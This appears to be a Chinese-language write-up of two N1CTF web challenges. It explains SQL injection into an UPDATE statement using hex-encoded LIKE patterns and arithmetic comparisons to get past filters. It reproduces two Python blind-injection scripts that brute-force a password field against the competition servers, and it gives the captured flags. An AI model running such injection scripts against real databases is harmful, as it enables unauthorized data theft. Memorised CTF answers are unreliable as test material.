N1CTF WEB

web签到题一 77777 1

由于题目已经关闭了，这里用其他大佬的图片.

看了大佬的wp学到构造payload:(因为waf的原因，采取十六进制绕过，0x25就是%)

flag=1111&hi= where (password like 0x25)

在源代码就是

Update users set points =1111 where (password like 0x25)

说明update语句执行成功.

下面放出大佬的盲注脚本:

import requests
import string
import urllib
url = "http://47.97.168.223/index.php"
flag = ""
true_flag = ""
for i in range(1,1000):
    payload = flag
    for j in "0123456789"+string.letters+"!@#$^&*(){}=+`~_":
        data = {
            "flag":"233333",
            "hi":urllib.unquote(" where (password like 0x%s25)"%(payload+hex(ord(j))[2:]))
        }
        r =requests.post(url=url,data=data)
        if '233333' in r.content:
            flag += hex(ord(j))[2:]
            true_flag += j
            print true_flag
            data1 = {
                "flag": "1",
                "hi": " where 1"
            }
            s = requests.post(url=url,data=data1)
            break

flag：N1CTF{he3l3locat233}

web签到题二 77777 2

这一题是上面一题的翻版，据说页面一样(当时忙忘记看了这题)

过滤了很多like和部分数字等等

构造运算绕过:(例)

select * from users where id=1+(username > "a")

此时的username>”a”为true

id= 1+true为2

上面是一个例子，同样updata也可以仿照这样的方法


附上大佬脚本(注意url编码问题)

import requests
import urllib
url = "http://47.52.137.90:20000/index.php"
flag = ""
for i in range(1,1000):
    for j in range(33,127):
        payload = urllib.unquote("%%2b( pw > '%s')"%(flag+chr(j)))
        data = {
             "flag":"10",
              "hi":payload
        }
        r = requests.post(url=url,data=data)
        if "| 10<br/>" in r.content:
            tmp = urllib.unquote("%%2b( pw > '%s')"%(flag+chr(j-1)))
            tmp_data = {
                "flag": "10",
                "hi": tmp
            }
            s = requests.post(url=url,data=tmp_data)
            if "| 11<br/>" in s.content:
                flag += chr(j-1)
                print flag
                break

flag：N1CTF{HAHAH777A7AHA77777AAAA}